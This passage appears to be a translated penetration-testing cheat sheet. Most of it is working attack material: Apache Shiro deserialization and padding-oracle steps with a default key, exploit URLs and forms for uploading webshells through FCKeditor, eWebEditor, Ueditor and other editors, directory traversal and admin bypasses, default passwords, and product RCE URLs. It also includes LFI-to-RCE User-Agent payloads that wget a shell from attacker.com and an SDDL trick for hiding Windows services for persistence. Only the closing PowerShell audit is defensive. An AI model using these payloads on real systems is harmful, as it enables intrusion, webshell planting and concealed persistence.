        byte[] payloads = Files.readAllBytes(FileSystems.getDefault().getPath("d://poc.ser"));
        AesCipherService aes = new AesCipherService();
        byte[] key = Base64.decode(CodecSupport.toBytes("kPH+bIxk5D2deZiIxcaaaA=="));
        ByteSource ciphertext = aes.encrypt(payloads, key);
        System.out.printf(ciphertext.toString());
    }
}
```

Shiro Padding Oracle Attack

Log in to the Shiro site and take the value of the rememberMe field from the cookie.
Probe with DNSlog, generating the payload with ysoserial:
```shell
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsBeanutils1 "ping 75bbot.dnslog.cn" > payload.class
```
Use the rememberMe value as the prefix, load the payload and run the padding oracle attack:
```shell
java -jar PaddingOracleAttack.jar targetUrl rememberMeCookie blockSize payloadFilePath
```
https://github.com/longofo/PaddingOracleAttack-Shiro-721

Request the site again with the constructed rememberMe attack string.

One-click automated exploitation tool: https://github.com/feihong-cs/ShiroExploit

Shiro authentication bypass

/;/test/admin/page

Editor vulnerabilities

FCKeditor

Version:
FCKeditor/_whatsnew.html
Editor:
FCKeditor/_samples/default.html
FCKeditor/_samples/asp/sample01.asp
FCKeditor/_samples/asp/sample02.asp
FCKeditor/_samples/asp/sample03.asp
FCKeditor/_samples/asp/sample04.asp
fckeditor/editor/filemanager/connectors/test.html
Upload:
FCKeditor/editor/filemanager/upload/test.html
FCKeditor/editor/filemanager/browser/default/connectors/test.html
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector
FCKeditor/editor/filemanager/connectors/test.html
FCKeditor/editor/filemanager/connectors/uploadtest.html
Upload path:
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

Loose filtering caused by FCKeditor's passive (blacklist) restriction policy
Affected versions: FCKeditor x.x <= FCKeditor v2.4.3
Description: in FCKeditor v2.4.3 the File category denies these upload types by default: html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm. Fckeditor 2.0 <= 2.2 allows files with the asa, cer, php2, php4, inc, pwml and pht extensions to be uploaded. After upload the file is saved directly as $sFilePath = $sServerDir . $sFileName, without using $sExtension as the extension. On Windows this directly allows a "." to be appended to the uploaded filename to bypass the check [untested]. Under Apache, the "Apache filename parsing flaw" can also be used; see "Appendix A". It is also recommended that, for other upload vulnerabilities, the File category be used when defining the TYPE variable, since according to FCKeditor's code its restrictions are the narrowest.
Exploitation: any other extension can be uploaded.

Uploading a webshell via the Windows 2003 path parsing flaw
Affected versions: see Appendix B at the bottom of the index
Description: using the Windows 2003 path-parsing flaw, create a directory such as bin.asp and upload a file into it; the file is then executed by the script interpreter with the corresponding script privileges.
Exploitation:
fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp
Force-create a shell.asp directory:
FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/shell.asp&NewFolderName=z&uuid=1244789975684
or
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp

FCKeditor PHP arbitrary file upload vulnerability
Affected versions: FCKeditor 2.2 <= FCKeditor 2.4.2
Description: FCKeditor has an input validation error when handling file uploads, which a remote attacker can use to upload arbitrary files. When uploading through editor/filemanager/upload/php/upload.php, supplying an invalid value for the Type parameter allows arbitrary scripts to be uploaded. A successful attack requires file upload to be enabled in config.php; it is disabled by default.
Exploitation (change the action field to the target URL):
```html
<form enctype="multipart/form-data" action="http://www.xxxx.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br><input type="file" name="NewFile" size="50"><br><input type="submit" value="Upload"></form>
```
Note: to try the v2.2 vulnerability, set Type to any value; but if you switch back to Media, the leading M must be uppercase, otherwise on Linux FCKeditor validates the directory name against the file name and the upload fails.

FCKeditor path disclosure vulnerability
Affected versions: aspx version of FCKeditor
Exploitation:
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/1.asp

FCKeditor file upload "." to "_" (underscore) bypass
Affected versions: FCKeditor => 2.4.x
Description: uploaded files such as shell.php.rar or shell.php;.jpg are renamed to shell_php;.jpg; this is a change in the newer FCK.
Exploitation: submit "1.php " (with a trailing space) to bypass all of it. The space only works on Windows, not on *nix ["1.php" and "1.php " are two different files].
Note: http://pstgroup.blogspot.com/2007/05/tipsfckeditor.html

FCKeditor file upload "." to "_" (underscore) bypass (2)
Affected versions: =>2.4.x; fixed in the latest version
Description: Fckeditor filters the first upload of a name in the 123.asp;123.jpg format (the IIS6 parsing flaw). The first upload is renamed to 123_asp;123.jpg and cannot run. But on the second upload of the same file 123.asp;123.jpg, because "123_asp;123.jpg" already exists, the file is named 123.asp;123(1).jpg, 123.asp;123(2).jpg and so on, so the IIS6 flaw applies again.
If the steps above do not succeed, possible reasons are: 1. File upload is not enabled in FCKeditor; it is off by default after installation, and FCKeditor shows an error when an upload is attempted. 2. The site uses a stripped-down FCKeditor that has lost many features, including file upload. 3. The vulnerability has been fixed.

FCKeditor news component directory traversal vulnerability
Affected versions: Aspx and JSP versions of FCKeditor
Description: for obtaining a webshell see "TYPE custom variable arbitrary file upload vulnerability" below.
Exploitation: modify the CurrentFolder parameter with ../../ to enter different directories:
/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=aspx.asp
The returned XML lists all of the site's directories:
/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F
/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F

TYPE custom variable arbitrary file upload vulnerability
Affected versions: earlier versions
Description: by customising the Type variable, files can be created or uploaded into a chosen directory, with no restriction on the upload file format.
Exploitation:
/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.asp
Opening this address allows any file type to be uploaded; the default location of the uploaded shell is http://www.xxxx.com/UserFiles/all/1.asp. Type=all is a custom value; it creates the directory all, and the new directory has no upload format restriction. For example:
/FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/asp/connector.asp
uploads the webshell to the site root.
Note: if the default upload folder cannot be found, check this file:
fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

eWebEditor

eWebEditor basics
Default admin paths:
/ewebeditor/admin_login.asp
/WebEdior/admin/login.aspx
It is best to also check whether admin_style.asp can be accessed directly.
Default database paths:
[PATH]/db/ewebeditor.mdb
[PATH]/db/db.mdb
[PATH]/db/%23ewebeditor.mdb
Default passwords: admin/admin888, admin/admin, admin/123456, admin/admin999
1. Click "Style management": add a new style, or modify a non-system style, and append |asp, |asa, |aaspsp or |cer (any script type the server will execute) to the upload types allowed for the image control. Click "Submit", set the toolbar to add the "Insert image" control, then preview the style, click insert image, upload the webshell and view the uploaded file's path in "Code" mode.
2. When the administrator has renamed the database to an asp or asa extension, the server side of a one-line webshell can be inserted into the database and then connected to with the client to obtain a webshell.
3. Upload succeeds but will not execute? No permission on the directory? Go back to Style management and look at the style you edited; the upload path can be customised there.
4. Upload type configured but uploads still fail? The file code has probably been modified; try setting the "remote type" and follow the method for the 6.0 version (see below), which lets you set the file types that are saved automatically from remote locations.
5. Cannot add toolbar items, but the file types in a style are set? Use Action.html (modify the action field).
6. Need to bypass the upload type restriction? Change the image upload type to "aaspsp;" (without quotes), rename the one-line shell to "1.asp;" (without quotes) and upload it. Source: 微笑刺客

eWebEditor: database downloadable but the hash cannot be cracked
Description: when the plaintext of the MD5 password in the downloaded database cannot be found, look at the webeditor_style(14) style table to see whether an earlier intruder already gave some control the ability to upload scripts, and construct an address to upload your own webshell.
Exploitation: for example ID=46, s-name=standard1; construct ewebeditor.asp?id=content&style=standard and, with the ID and style name changed, ewebeditor.asp?id=46&style=standard1

eWebEditor directory traversal vulnerability
Description: ewebeditor/admin_uploadfile.asp and admin/upload.asp do not filter input strictly, allowing directory traversal.
Exploitation:
First method: ewebeditor/admin_uploadfile.asp?id=14, then append &dir=.., then &dir=../.., then &dir=http://www.xxxx.com/../.. to see the whole site's files.
Second method: ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir=./..

eWebEditor 5.2 directory listing vulnerability
Description: ewebeditor/asp/browse.asp does not filter input strictly, allowing directory traversal.
Exploitation: http://www.xxxx.com/ewebeditor/asp/browse.asp?style=standard650&dir=…././/..

Entering the admin area via the eWebEditor session spoofing vulnerability
Description: the vulnerable file Admin_Private.asp checks only the session; it validates neither the cookies nor the path.
Exploitation: create a test.asp with the following content:
```asp
<%Session("eWebEditor_User") = "11111111"%>
```
Visit test.asp, then visit any admin file, for example Admin_Default.asp

eWebEditor ASP version 2.1.6 upload vulnerability
Exploitation (change the action field to the target URL): ewebeditor asp版2.1.6上傳漏洞利用程序.html

eWebEditor 2.7.0 injection vulnerability
Exploitation: http://www.xxxx.com/ewebeditor/ewebeditor.asp?id=article_content&style=full_v200
Default table name: eWebEditor_System; default column names: sys_UserName, sys_UserPass. Then use nbsi to guess the values.

eWebEditor 2.8.0 final: arbitrary file deletion vulnerability
Description: the vulnerability is in delete.asp under the Example\NewsSystem directory, a test page of ewebeditor that can be reached without logging in.
Exploitation (change the action field to the target URL): Del Files.html

eWebEditor PHP/ASP admin bypass
Affected versions: PHP ≥ 3.0~3.8; also works on ASP 2.8, and possibly lower versions (untested).
Exploitation: open the admin page /eWebEditor/admin/login.php, enter any user name and password, and an error is shown. Then clear the browser's URL bar and enter
javascript:alert(document.cookie="adminuser="+escape("admin"));
javascript:alert(document.cookie="adminpass="+escape("admin"));
javascript:alert(document.cookie="admindj="+escape("1"));
pressing Enter after each of the three. Clear the URL bar again and enter a normally inaccessible file such as ../ewebeditor/admin/default.php, and you are in.

eWebEditor for PHP arbitrary file upload vulnerability
Affected versions: ewebeditor php v3.8 or older
Description: this version stores all style configuration in an array $aStyle; with register_global set to on in php.ini we can add any style we like and define its upload types.
Exploitation: phpupload.html

eWebEditor JSP version: the vulnerabilities are much the same.

eWebEditor 2.8 commercial version: inserting a one-line webshell
Affected versions: =>2.8 commercial
Exploitation: log in to the admin area, click change password and set the new password to 1":eval request("h")' . Once set, visit asp/config.asp; the one-line webshell has been written into that file. Note: the code may have been altered in reposting, so test it locally before submitting.

eWebEditorNet upload.aspx upload vulnerability (WebEditorNet)
Description: WebEditorNet's upload.aspx has an upload vulnerability.
Exploitation: default upload address /ewebeditornet/upload.aspx; a cer webshell can be uploaded directly. If it cannot, enter javascript:lbtnUpload.click(); in the browser address bar. Afterwards view the source and find uploadsave for the saved path; by default files go to the uploadfile folder.

southidceditor (usually the v2.8.0 eWeb core)

http://www.xxxx.com/admin/southidceditor/datas/southidceditor.mdb
http://www.xxxx.com/admin/southidceditor/admin/admin_login.asp
http://www.xxxx.com/admin/southidceditor/popup.asp

bigcneditor (eWeb 2.7.5 VIP core)

Bigcneditor is simply the VIP-user build of eWebEditor 2.7.5. The reason admin_login.asp cannot be opened and answers "insufficient permissions" is probably its "Licensed" check; perhaps only authorised machines may reach the admin area. The small tricks above against eWebEditor v2.8 and lower may also apply here; there is not much else to do.

Cute Editor

Cute Editor online editor local file inclusion vulnerability

Affected versions: CuteEditor For Net 6.4
Description: any website file can be read; the impact is serious.
Exploitation: http://www.xxxx.com/CuteSoft_Client/CuteEditor/Load.ashx?type=image&file=../../../web.config

Cute Editor ASP.NET version: obtaining privileges via the IIS parsing flaw
Affected versions: CuteEditor for ASP.NET Chinese version
Description: CuteEditor does not rename uploaded files, so the IIS filename-parsing bug can be used to obtain webshell privileges.
Exploitation: targets can be found by searching inurl:Post.aspx?SmallClassID= in a search engine. In the editor click "Insert multimedia" and upload a webshell named "xxx.asp;.avi" to obtain privileges.

Webhtmleditor

Obtaining a shell via the Windows 2003 IIS filename parsing flaw
Affected versions: <= Webhtmleditor final 1.7 (no longer updated)
Description/exploitation: uploaded images and other files are not renamed, so a malicious user can upload diy.asp;.jpg to bypass the extension check. For this kind of author oversight, even thumbnailing and file-header checks can be beaten with an image containing a one-line webshell.

Kindeditor

Obtaining a shell via the Windows 2003 IIS filename parsing flaw
Affected versions: <= kindeditor 3.2.1 (the latest version, released in August 2009)
Description/exploitation: using the official site as the demonstration: open http://www.xxxx.com/ke/examples/index.html, pick any demo and click image upload; someone uploaded the following file: http://www.xxxx.com/ke/attached/test.asp;.jpg
Note: see Appendix C for an explanation of the principle.

Freetextbox

Freetextbox directory traversal vulnerability
Affected versions: unknown
Description: the code of ftb.imagegallery.aspx filters only / and not \, which leads to directory traversal.
Exploitation: clicking the image button on the editor page opens a popup (capture the request to get its address); construct the following to traverse directories:
http://www.xxxx.com/Member/images/ftb/HelperScripts/ftb.imagegallery.aspx?frame=1&rif=..&cif=\..

Freetextbox ASP.NET version: obtaining privileges via the IIS parsing flaw
Affected versions: all
Description: there is no login check, so the upload page can be reached directly. Freetextbox 3-3-1 allows files of any format to be uploaded; Freetextbox 1.6.3 and other versions allow the x.asp;.jpg format.
Exploitation: use the IIS parsing flaw to obtain a shell; after upload the shell path is http://www.xxxx.com/images/x.asp;.jpg

Msn editor

Obtaining a shell via the Windows 2003 IIS filename parsing flaw
Affected versions: unknown
Description: clicking image upload opens the upload page at http://www.xxxx.com/admin/uploadPic.asp?language=&editImageNum=0&editRemNum= . After uploading an ordinary image its address is http://www.xxxx.com/news/uppic/41513102009204012_1.gif. Note this path; clicking image upload again changes the address to http://www.xxxx.com/news/admin/uploadPic.asp?language=&editImageNum=1&editRemNum=41513102009204012. Clearly the image path is generated from the number after RemNum.
Exploitation: combined with the IIS parsing flaw, change the value after RemNum to 1.asp;41513102009204012, giving http://www.xxxx.com/admin/uploadPic.asp?language=&editImageNum=0&editRemNum=1.asp;41513102009204012. Open it in the browser, select the script webshell to upload, and the returned address uppic/1.asp;41513102009204012_2.gif is the webshell.

Ueditor

1.4.3.3 .NET version
```html
<form action="http://xx.com/ueditor/net/controller.ashx?action=catchimage" enctype="multipart/form-data" method="POST">
 <p>shell addr: <input type="text" name="source[]" /></p>
 <input type="submit" value="Submit" />
</form>
```
Use the form to fetch a remote image shell; append ?.aspx after the remote image URL, e.g. http://1.1.1.1/uploads/1.gif?.aspx

BT (Baota) panel unauthenticated phpMyAdmin access

Affected: BT Linux panel 7.4.2, BT Linux beta 7.5.13, Windows panel 6.8. Directly visit http://your_ip:888/pma

深x服

EDR RCE: https://ip+port/tool/log/c.php?strip_slashes=system&host=id executes the command.
Endpoint detection and response platform, arbitrary user login: fofa query title="終端檢測響應平臺"; target + /ui/login.php?user=admin logs in directly.

天r信

The default user superman has uid=1:
```
POST /?module-auth_user&action=mod_edit.pwd HTTP/1.1
```

From LFI to RCE

Given an LFI such as
https://www.website.com/index.php?pg=../../../../etc/passwd
try including /proc/self/environ:
https://www.website.com/index.php?pg=../../../../proc/self/environ
If the User-Agent appears in it, modify the UA to achieve RCE:
```
User-Agent: <?system('wget http://attacker.com/shell.txt -O shell.php');?>
User-Agent: <?exec('wget http://attacker.com/shell.txt -O shell.php');?>
User-Agent: <?php phpinfo(); ?>
```
A file can also be created on the server itself to write the shell:
```
User-Agent: <?php $a = base64_decode('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'); $file = fopen('shell.php','w'); echo fwrite($file,$a); fclose($file); ?>
```

Hiding Windows services

Translated from: https://www.sans.org/blog/red-team-tactics-hiding-windows-services/
A Windows feature lets a red team or attacker hide a service, offering a way to evade detection by common host-based threat hunting techniques. Here we assume the Fax service is our malicious file or backdoor. Opening services.msc shows the service.
Running a command also shows the service.
With administrator privileges, run the following command (the string is Security Descriptor Definition Language, SDDL):
```powershell
& $env:SystemRoot\System32\sc.exe sdset SWCUEngine "D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
```
The service can no longer be queried.
In a red team engagement or penetration test this can be a useful technique for maintaining persistence on a compromised host; the hidden service also starts automatically after a reboot. Command to unhide the service:
```powershell
& $env:SystemRoot\System32\sc.exe sdset SWCUEngine "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
```
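An added PowerShell audit, not part of the original post or the SANS article, that looks for services hidden this way: it compares the Win32 services registered under HKLM\SYSTEM\CurrentControlSet\Services with what Get-Service returns, and parses each service's SDDL from sc.exe sdshow for Deny ACEs. The registry path and ACE syntax are standard Windows; run it from an elevated session.

```powershell
# Added example (not from the original post): find services hidden with a Deny ACE.
# Two signals are combined: the service exists in the registry but the SCM no longer
# lists it, and/or its SDDL contains Deny ACEs (type "D"). Run elevated; sdshow still
# works for administrators because the hiding SDDL above does not deny READ_CONTROL (RC).
function Find-HiddenServices {
    [CmdletBinding()]
    param()

    # Services the SCM is willing to enumerate for the current caller
    $visible = @{}
    Get-Service | ForEach-Object { $visible[$_.Name] = $true }

    # Every service is registered under this key regardless of its ACL.
    # Type 0x10/0x20 = Win32 own/shared process (0x50/0x60 are per-user services);
    # kernel drivers (0x1/0x2) are skipped because Get-Service never lists them.
    Get-ChildItem 'HKLM:\SYSTEM\CurrentControlSet\Services' -ErrorAction SilentlyContinue | ForEach-Object {
        $type = (Get-ItemProperty -Path $_.PSPath -ErrorAction SilentlyContinue).Type
        if (-not $type -or -not ($type -band 0x30)) { return }   # 'return' = next item

        $name = $_.PSChildName
        $sddl = (& "$env:SystemRoot\System32\sc.exe" sdshow $name | Out-String).Trim()
        if (-not $sddl.StartsWith('D:')) { return }               # no descriptor returned

        # ACE syntax: (Type;Flags;Rights;ObjectGuid;InheritObjectGuid;Trustee)
        $denyAces = [regex]::Matches($sddl, '\(D;[^;]*;([^;]*);[^;]*;[^;]*;([^)]*)\)')
        $listed   = $visible.ContainsKey($name)

        if (-not $listed -or $denyAces.Count -gt 0) {
            [pscustomobject]@{
                Service      = $name
                ShownByScm   = $listed
                DeniedTo     = ($denyAces | ForEach-Object { $_.Groups[2].Value }) -join ','
                DeniedRights = ($denyAces | ForEach-Object { $_.Groups[1].Value } | Sort-Object -Unique) -join ','
                Sddl         = $sddl
            }
        }
    }
}

# A service hidden with the sdset command above shows ShownByScm=False,
# DeniedTo=IU,SU,BA and DeniedRights=DCLCWPDTSD (LC = SERVICE_QUERY_STATUS,
# which is exactly the right the SCM needs in order to enumerate it).
Find-HiddenServices | Format-Table Service, ShownByScm, DeniedTo, DeniedRights -AutoSize
```

Deny ACEs on services are rare on a stock system, so any hit deserves a look at the binary path under the service's registry key; the Sddl column can then be compared with the unhide command above.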